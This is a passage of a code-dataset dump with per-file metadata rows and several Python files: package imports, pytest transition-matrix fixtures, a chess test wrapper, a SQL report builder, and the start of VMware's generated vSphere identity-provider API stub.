| 86.409091 | 143 | 0.757496 | 240 | 1,901 | 5.6625 | 0.275 | 0.229581 | 0.198676 | 0.317881 | 0.701987 | 0.701987 | 0.701987 | 0.701987 | 0.701987 | 0.298013 | 0 | 0.030664 | 0.073645 | 1,901 | 21 | 144 | 90.52381 | 0.741056 | 0.02788 | 0 | 0 | 1 | 0 | 0.10532 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d2f1379deb69a0df65e46bd9a394791093d83676 | 73 | py | Python | src/constants/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | src/constants/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | src/constants/__init__.py | ProfessorQu/Risky-Robots | 31f2d3a7755113a010f2092ef02dc3b5980a665f | [
"MIT"
] | null | null | null | from src.constants import *
from src.constants.direction import Direction | 36.5 | 45 | 0.849315 | 10 | 73 | 6.2 | 0.5 | 0.225806 | 0.516129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09589 | 73 | 2 | 45 | 36.5 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
961efc9611f00a5c94e7d51e2726753c2f3406ba | 2,400 | py | Python | source_ddc/test/conftest.py | sansan-inc/econ-source | 9edf3043558779f741b27f38c129242de5c25bdc | [
"Apache-2.0"
] | 26 | 2020-08-28T00:48:20.000Z | 2022-02-27T22:10:53.000Z | source_ddc/test/conftest.py | sansan-inc/econ-source | 9edf3043558779f741b27f38c129242de5c25bdc | [
"Apache-2.0"
] | 3 | 2020-08-28T06:04:27.000Z | 2020-08-28T08:03:52.000Z | source_ddc/test/conftest.py | sansan-inc/econ-source | 9edf3043558779f741b27f38c129242de5c25bdc | [
"Apache-2.0"
] | 3 | 2020-08-28T10:38:42.000Z | 2021-02-27T16:07:52.000Z | import pytest
import numpy as np
@pytest.fixture
def simple_transition_matrix():
return np.array(
[
[
[1., 0., 0., 0., 0.],
[0.1, 0.9, 0., 0., 0.],
[0., 0.1, 0.9, 0., 0.],
[0., 0., 0.1, 0.9, 0.],
[0., 0., 0., 0.1, 0.9]
],
[
[0.4, 0.6, 0., 0., 0.],
[0.1, 0.3, 0.6, 0., 0.],
[0., 0.1, 0.3, 0.6, 0.],
[0., 0., 0.1, 0.3, 0.6],
[0., 0., 0., 0.1, 0.9]
]
]
)
@pytest.fixture
def large_transition_matrix():
return np.array(
[
[
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1., 0, 0, 0, 0, 0, 0, 0, 0, 0],
],
[
[0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0, 0, 0],
[0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0, 0],
[0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0],
[0, 0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0],
[0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0],
[0, 0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25, 0],
[0, 0, 0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25],
[0, 0, 0, 0, 0, 0, 0, 0.33, 0.33, 0.34],
[0, 0, 0, 0, 0, 0, 0, 0, 0.5, 0.5],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
],
[
[0.2, 0.2, 0.2, 0.2, 0.2, 0, 0, 0, 0, 0],
[0, 0.2, 0.2, 0.2, 0.2, 0.2, 0, 0, 0, 0],
[0, 0, 0.2, 0.2, 0.2, 0.2, 0.2, 0, 0, 0],
[0, 0, 0, 0.2, 0.2, 0.2, 0.2, 0.2, 0, 0],
[0, 0, 0, 0, 0.2, 0.2, 0.2, 0.2, 0.2, 0],
[0, 0, 0, 0, 0, 0.2, 0.2, 0.2, 0.2, 0.2],
[0, 0, 0, 0, 0, 0, 0.25, 0.25, 0.25, 0.25],
[0, 0, 0, 0, 0, 0, 0, 0.33, 0.33, 0.34],
[0, 0, 0, 0, 0, 0, 0, 0, 0.5, 0.5],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
]
]
)
| 34.782609 | 59 | 0.255417 | 467 | 2,400 | 1.304069 | 0.051392 | 0.765189 | 0.970443 | 1.057471 | 0.883415 | 0.883415 | 0.883415 | 0.881773 | 0.881773 | 0.881773 | 0 | 0.398839 | 0.4975 | 2,400 | 68 | 60 | 35.294118 | 0.106136 | 0 | 0 | 0.421875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03125 | true | 0 | 0.03125 | 0.03125 | 0.09375 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
7da3a7a75e1d99bc6653a3e31ade8bfc8885043e | 115 | py | Python | test/specific_env_tests.py | FaramaFoundation/PettingZoo | 62081cfcbdf284f4190c0f03a795604ab66f419b | [
"Apache-2.0"
] | null | null | null | test/specific_env_tests.py | FaramaFoundation/PettingZoo | 62081cfcbdf284f4190c0f03a795604ab66f419b | [
"Apache-2.0"
] | null | null | null | test/specific_env_tests.py | FaramaFoundation/PettingZoo | 62081cfcbdf284f4190c0f03a795604ab66f419b | [
"Apache-2.0"
] | null | null | null | from pettingzoo.classic.chess.test_chess import test_chess
def specific_env_tests():
test_chess.test_chess()
| 19.166667 | 58 | 0.808696 | 17 | 115 | 5.117647 | 0.588235 | 0.413793 | 0.321839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113043 | 115 | 5 | 59 | 23 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
7dce1d6e31df3b9dd20fe291c8669349f89e53cf | 4,304 | py | Python | aib/sql/sls_nsls_by_loc.py | FrankMillman/AccInABox | fc4cd26bf525c1bbe8e541d9339c69b0adbad546 | [
"MIT"
] | 3 | 2015-02-25T19:44:43.000Z | 2020-12-18T05:49:09.000Z | aib/sql/sls_nsls_by_loc.py | FrankMillman/AccInABox | fc4cd26bf525c1bbe8e541d9339c69b0adbad546 | [
"MIT"
] | 1 | 2019-11-20T12:31:34.000Z | 2019-11-20T12:31:35.000Z | aib/sql/sls_nsls_by_loc.py | FrankMillman/AccInABox | fc4cd26bf525c1bbe8e541d9339c69b0adbad546 | [
"MIT"
] | 1 | 2020-06-07T06:25:19.000Z | 2020-06-07T06:25:19.000Z | async def get_sql(cte, params, company, conn, locations):
common = f"""
(
SELECT a.location_id, SUM(a.tran_tot) AS tran_tot FROM
(
SELECT b.location_id, a.tran_date, a.tran_tot,
ROW_NUMBER() OVER (PARTITION BY a.nsls_code_id, a.location_row_id,
a.function_row_id, a.source_code_id
ORDER BY a.tran_date DESC) row_num
FROM {company}.nsls_totals a
JOIN {company}.adm_locations b ON b.row_id = a.location_row_id
WHERE a.deleted_id = 0 AND a.tran_date <= dates.cl_date
) AS a
WHERE a.row_num = 1
GROUP BY a.location_id
) AS cl_bal
LEFT JOIN
(
SELECT a.location_id, SUM(a.tran_tot) AS tran_tot FROM
(
SELECT b.location_id, a.tran_date, a.tran_tot,
ROW_NUMBER() OVER (PARTITION BY a.nsls_code_id, a.location_row_id,
a.function_row_id, a.source_code_id
ORDER BY a.tran_date DESC) row_num
FROM {company}.nsls_totals a
JOIN {company}.adm_locations b ON b.row_id = a.location_row_id
WHERE a.deleted_id = 0 AND a.tran_date < dates.op_date
) AS a
WHERE a.row_num = 1
GROUP BY a.location_id
) AS op_bal
ON op_bal.location_id = cl_bal.location_id
"""
if conn.constants.servertype == 'sqlite3':
sql = cte + f"""
SELECT
dates.op_date AS "Start [DATE]", dates.cl_date AS "End [DATE]",
{', '.join(f'''
COALESCE((SELECT SUM(CASE WHEN cl_bal.location_id = '{location}' THEN
COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)
ELSE 0 END) FROM {common}), 0) AS "{location} [REAL2]"
''' for location in locations) }
{', ' if locations else ''}
COALESCE((SELECT SUM(COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)) FROM {common}), 0) AS "total [REAL2]"
FROM dates
ORDER BY dates.op_date
"""
elif conn.constants.servertype == 'pgsql':
sql = cte + f"""
SELECT
dates.op_date AS "Start [DATE]", dates.cl_date AS "End [DATE]",
{', '.join(f'COALESCE(a.{location}, 0) AS "{location} [REAL2]"' for location in locations)}
{', ' if locations else ''}
COALESCE(a.total, 0) AS "total [REAL2]"
FROM dates
JOIN LATERAL
(SELECT
{', '.join(f'''
SUM(CASE WHEN cl_bal.location_id = '{location}' THEN
COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)
ELSE 0 END) AS {location}
''' for location in locations) }
{', ' if locations else ''}
SUM(COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)) AS total
FROM {common}
) AS a
ON true
ORDER BY dates.op_date
"""
elif conn.constants.servertype == 'mssql':
sql = cte + f"""
SELECT
dates.op_date AS "Start [DATE]", dates.cl_date AS "End [DATE]",
{', '.join(f'COALESCE(a.{location}, 0) AS "{location} [REAL2]"' for location in locations)}
{', ' if locations else ''}
COALESCE(a.total, 0) AS "total [REAL2]"
FROM dates
CROSS APPLY
(SELECT
{', '.join(f'''
SUM(CASE WHEN cl_bal.location_id = '{location}' THEN
COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)
ELSE 0 END) AS {location}
''' for location in locations) }
{', ' if locations else ''}
SUM(COALESCE(cl_bal.tran_tot, 0) - COALESCE(op_bal.tran_tot, 0)) AS total
FROM {common}
) AS a
ORDER BY dates.op_date
"""
fmt = f"{{:%d-%m}}/{{:%d-%m}} : {'{:>10.2f}' * len(locations)}{{:>12.2f}}"
return sql, params, fmt
| 44.371134 | 135 | 0.495586 | 538 | 4,304 | 3.77881 | 0.14684 | 0.061977 | 0.059026 | 0.064929 | 0.877521 | 0.867683 | 0.856862 | 0.856862 | 0.856862 | 0.812592 | 0 | 0.014493 | 0.390799 | 4,304 | 96 | 136 | 44.833333 | 0.76087 | 0 | 0 | 0.75 | 0 | 0.065217 | 0.92263 | 0.118262 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.01087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7dec4cdc4587d213a03288dc4893a504f1f73e52 | 94,920 | py | Python | com/vmware/vcenter/identity_client.py | adammillerio/vsphere-automation-sdk-python | c07e1be98615201139b26c28db3aa584c4254b66 | [
"MIT"
] | null | null | null | com/vmware/vcenter/identity_client.py | adammillerio/vsphere-automation-sdk-python | c07e1be98615201139b26c28db3aa584c4254b66 | [
"MIT"
] | null | null | null | com/vmware/vcenter/identity_client.py | adammillerio/vsphere-automation-sdk-python | c07e1be98615201139b26c28db3aa584c4254b66 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.vcenter.identity.
#---------------------------------------------------------------------------
"""
The ``com.vmware.vcenter.identity_client`` module provides classes to manage
VcIdentity.
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Providers(VapiInterface):
"""
The ``Providers`` interface provides methods to list, read and modify
vCenter Server identity providers. This class was added in vSphere API
7.0.0.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.identity.providers'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ProvidersStub)
self._VAPI_OPERATION_IDS = {}
class ConfigType(Enum):
"""
The ``Providers.ConfigType`` class contains the possible types of vCenter
Server identity providers. This enumeration was added in vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
Oauth2 = None
"""
Config for OAuth2. This class attribute was added in vSphere API 7.0.0.
"""
Oidc = None
"""
Config for OIDC. This class attribute was added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`ConfigType` instance.
"""
Enum.__init__(string)
ConfigType._set_values([
ConfigType('Oauth2'),
ConfigType('Oidc'),
])
ConfigType._set_binding_type(type.EnumType(
'com.vmware.vcenter.identity.providers.config_type',
ConfigType))
class IdmProtocol(Enum):
"""
The ``Providers.IdmProtocol`` class contains the possible types of
communication protocols to the identity management endpoints. This
enumeration was added in vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
REST = None
"""
REST protocol based identity management endpoints. This class attribute was
added in vSphere API 7.0.0.
"""
SCIM = None
"""
SCIM protocol based identity management endpoints. This class attribute was
added in vSphere API 7.0.0.
"""
LDAP = None
"""
LDAP protocol based identity management endpoints. This class attribute was
added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`IdmProtocol` instance.
"""
Enum.__init__(string)
IdmProtocol._set_values([
IdmProtocol('REST'),
IdmProtocol('SCIM'),
IdmProtocol('LDAP'),
])
IdmProtocol._set_binding_type(type.EnumType(
'com.vmware.vcenter.identity.providers.idm_protocol',
IdmProtocol))
class Oauth2AuthenticationMethod(Enum):
"""
The ``Providers.Oauth2AuthenticationMethod`` class contains the possible
types of OAuth2 authentication methods. This enumeration was added in
vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
CLIENT_SECRET_BASIC = None
"""
Clients that have received a client_secret value from the Authorization
Server, authenticate with the Authorization Server in accordance with
Section 3.2.1 of OAuth 2.0 [RFC6749] using the HTTP Basic authentication
scheme. This class attribute was added in vSphere API 7.0.0.
"""
CLIENT_SECRET_POST = None
"""
Clients that have received a client_secret value from the Authorization
Server, authenticate with the Authorization Server in accordance with
Section 3.2.1 of OAuth 2.0 [RFC6749] by including the Client Credentials in
the request body. This class attribute was added in vSphere API 7.0.0.
"""
CLIENT_SECRET_JWT = None
"""
Clients that have received a client_secret value from the Authorization
Server, create a JWT using an HMAC SHA algorithm, such as HMAC SHA-256. The
HMAC (Hash-based Message Authentication Code) is calculated using the
octets of the UTF-8 representation of the client_secret as the shared key.
This class attribute was added in vSphere API 7.0.0.
"""
PRIVATE_KEY_JWT = None
"""
Clients that have registered a public key sign a JWT using that key. The
client authenticates in accordance with JSON Web Token (JWT) Profile for
OAuth 2.0 Client Authentication and Authorization Grants [OAuth.JWT] and
Assertion Framework for OAuth 2.0 Client Authentication and Authorization
Grants [OAuth.Assertions]. This class attribute was added in vSphere API
7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Oauth2AuthenticationMethod` instance.
"""
Enum.__init__(string)
Oauth2AuthenticationMethod._set_values([
Oauth2AuthenticationMethod('CLIENT_SECRET_BASIC'),
Oauth2AuthenticationMethod('CLIENT_SECRET_POST'),
Oauth2AuthenticationMethod('CLIENT_SECRET_JWT'),
Oauth2AuthenticationMethod('PRIVATE_KEY_JWT'),
])
Oauth2AuthenticationMethod._set_binding_type(type.EnumType(
'com.vmware.vcenter.identity.providers.oauth2_authentication_method',
Oauth2AuthenticationMethod))
class Summary(VapiStruct):
"""
The ``Providers.Summary`` class contains commonly used information about an
identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
]
def __init__(self,
provider=None,
name=None,
config_tag=None,
oauth2=None,
oidc=None,
is_default=None,
domain_names=None,
auth_query_params=None,
):
"""
:type provider: :class:`str`
:param provider: The identifier of the provider. This attribute was added in vSphere
API 7.0.0.
When clients pass a value of this class as a parameter, the
attribute must be an identifier for the resource type:
``com.vmware.vcenter.identity.Providers``. When methods return a
value of this class as a return value, the attribute will be an
identifier for the resource type:
``com.vmware.vcenter.identity.Providers``.
:type name: :class:`str`
:param name: The user friendly name for the provider. This attribute was added
in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2Summary`
:param oauth2: OAuth2 Summary. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcSummary`
:param oidc: OIDC Summary. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type is_default: :class:`bool`
:param is_default: Specifies whether the provider is the default provider. This
attribute was added in vSphere API 7.0.0.
:type domain_names: :class:`set` of :class:`str`
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. If
domainNames is an empty set, domain validation behavior at login
with this identity provider will be as follows: the user's domain
will be parsed from the User Principal Name (UPN) value that is
found in the tokens returned by the identity provider. This domain
will then be implicitly trusted and used to filter any groups that
are also provided in the tokens. This attribute was added in
vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
"""
self.provider = provider
self.name = name
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.is_default = is_default
self.domain_names = domain_names
self.auth_query_params = auth_query_params
VapiStruct.__init__(self)
Summary._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.summary', {
'provider': type.IdType(resource_types='com.vmware.vcenter.identity.Providers'),
'name': type.OptionalType(type.StringType()),
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2Summary')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcSummary')),
'is_default': type.BooleanType(),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
},
Summary,
False,
None))
class Info(VapiStruct):
"""
The ``Providers.Info`` class contains the information about an identity
provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
UnionValidator(
'idm_protocol',
{
'REST' : [('idm_endpoints', True)],
'SCIM' : [('idm_endpoints', True)],
'LDAP' : [('active_directory_over_ldap', True)],
}
),
]
def __init__(self,
name=None,
org_ids=None,
config_tag=None,
oauth2=None,
oidc=None,
is_default=None,
domain_names=None,
auth_query_params=None,
idm_protocol=None,
idm_endpoints=None,
active_directory_over_ldap=None,
upn_claim=None,
groups_claim=None,
):
"""
:type name: :class:`str`
:param name: The user friendly name for the provider. This attribute was added
in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type org_ids: :class:`set` of :class:`str`
:param org_ids: The set of orgIds as part of SDDC creation which provides the basis
for tenancy. This attribute was added in vSphere API 7.0.0.
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2Info`
:param oauth2: OAuth2 Info. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcInfo`
:param oidc: OIDC Info. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type is_default: :class:`bool`
:param is_default: Specifies whether the provider is the default provider. This
attribute was added in vSphere API 7.0.0.
:type domain_names: :class:`set` of :class:`str`
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
include only those groups that belong to one of these domains. If
domainNames is an empty set, domain validation behavior at login
with this identity provider will be as follows: the user's domain
will be parsed from the User Principal Name (UPN) value that is
found in the tokens returned by the identity provider. This domain
will then be implicitly trusted and used to filter any groups that
are also provided in the tokens. This attribute was added in
vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type auth_query_params: :class:`dict` of :class:`str` and :class:`list` of :class:`str`
:param auth_query_params:
key/value pairs that are to be appended to the authEndpoint
request.
How to append to authEndpoint request: If the map is not empty, a
"?" is added to the endpoint URL, and combination of each k and
each string in the v is added with an "&" delimiter. Details:
* If the value contains only one string, then the key is added with
"k=v".
* If the value is an empty list, then the key is added without a
"=v".
* If the value contains multiple strings, then the key is repeated
in the query-string for each string in the value.
. This attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type idm_protocol: :class:`Providers.IdmProtocol` or ``None``
:param idm_protocol: Communication protocol to the identity management endpoints. This
attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type idm_endpoints: :class:`list` of :class:`str`
:param idm_endpoints: Identity management endpoints. This attribute was added in vSphere
API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is one of :attr:`Providers.IdmProtocol.REST` or
:attr:`Providers.IdmProtocol.SCIM`.
:type active_directory_over_ldap: :class:`Providers.ActiveDirectoryOverLdap`
:param active_directory_over_ldap: Identity management configuration. This attribute was added in
vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``idmProtocol`` is :attr:`Providers.IdmProtocol.LDAP`.
:type upn_claim: :class:`str`
:param upn_claim: Specifies which claim provides the user principal name (UPN) for
the user. This attribute was added in vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
:type groups_claim: :class:`str`
:param groups_claim: Specifies which claim provides the group membership for the token
subject. If empty, the default behavior for CSP is used. In this
case, the groups for the subject will be comprised of the groups in
'group_names' and 'group_ids' claims. This attribute was added in
vSphere API 7.0.0.
This attribute is optional because it was added in a newer version
than its parent node.
"""
self.name = name
self.org_ids = org_ids
self.config_tag = config_tag
self.oauth2 = oauth2
self.oidc = oidc
self.is_default = is_default
self.domain_names = domain_names
self.auth_query_params = auth_query_params
self.idm_protocol = idm_protocol
self.idm_endpoints = idm_endpoints
self.active_directory_over_ldap = active_directory_over_ldap
self.upn_claim = upn_claim
self.groups_claim = groups_claim
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.identity.providers.info', {
'name': type.OptionalType(type.StringType()),
'org_ids': type.SetType(type.StringType()),
'config_tag': type.ReferenceType(__name__, 'Providers.ConfigType'),
'oauth2': type.OptionalType(type.ReferenceType(__name__, 'Providers.Oauth2Info')),
'oidc': type.OptionalType(type.ReferenceType(__name__, 'Providers.OidcInfo')),
'is_default': type.BooleanType(),
'domain_names': type.OptionalType(type.SetType(type.StringType())),
'auth_query_params': type.OptionalType(type.MapType(type.StringType(), type.ListType(type.StringType()))),
'idm_protocol': type.OptionalType(type.ReferenceType(__name__, 'Providers.IdmProtocol')),
'idm_endpoints': type.OptionalType(type.ListType(type.URIType())),
'active_directory_over_ldap': type.OptionalType(type.ReferenceType(__name__, 'Providers.ActiveDirectoryOverLdap')),
'upn_claim': type.OptionalType(type.StringType()),
'groups_claim': type.OptionalType(type.StringType()),
},
Info,
False,
None))
class CreateSpec(VapiStruct):
"""
The ``Providers.CreateSpec`` class contains the information used to create
an identity provider. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
_validator_list = [
UnionValidator(
'config_tag',
{
'Oauth2' : [('oauth2', True)],
'Oidc' : [('oidc', True)],
}
),
UnionValidator(
'idm_protocol',
{
'REST' : [('idm_endpoints', True)],
'SCIM' : [('idm_endpoints', True)],
'LDAP' : [('active_directory_over_ldap', True)],
}
),
]
def __init__(self,
config_tag=None,
oauth2=None,
oidc=None,
org_ids=None,
is_default=None,
name=None,
domain_names=None,
auth_query_params=None,
idm_protocol=None,
idm_endpoints=None,
active_directory_over_ldap=None,
upn_claim=None,
groups_claim=None,
):
"""
:type config_tag: :class:`Providers.ConfigType`
:param config_tag: The config type of the identity provider. This attribute was added
in vSphere API 7.0.0.
:type oauth2: :class:`Providers.Oauth2CreateSpec`
:param oauth2: OAuth2 CreateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oauth2`.
:type oidc: :class:`Providers.OidcCreateSpec`
:param oidc: OIDC CreateSpec. This attribute was added in vSphere API 7.0.0.
This attribute is optional and it is only relevant when the value
of ``configTag`` is :attr:`Providers.ConfigType.Oidc`.
:type org_ids: :class:`set` of :class:`str` or ``None``
:param org_ids: The set of orgIds as part of SDDC creation which provides the basis
for tenancy. This attribute was added in vSphere API 7.0.0.
If None, the set will be empty.
:type is_default: :class:`bool` or ``None``
:param is_default: Specifies whether the provider is the default provider. Setting
``isDefault`` of current provider to True makes all other providers
non-default. If no other providers created in this vCenter Server
before, this parameter will be disregarded, and the provider will
always be set to the default. This attribute was added in vSphere
API 7.0.0.
If None the provider will be the default provider if it is the
first provider that is created, and will not be the default
provider otherwise.
:type name: :class:`str` or ``None``
:param name: The user friendly name for the provider. This name can be used for
human-readable identification purposes, but it does not have to be
unique, as the system will use internal UUIDs to differentiate
providers. This attribute was added in vSphere API 7.0.0.
If None, the name will be the empty string
:type domain_names: :class:`set` of :class:`str` or ``None``
:param domain_names: Set of fully qualified domain names to trust when federating with
this identity provider. Tokens from this identity provider will
only be validated if the user belongs to one of these domains, and
any domain-qualified groups in the tokens will be filtered to
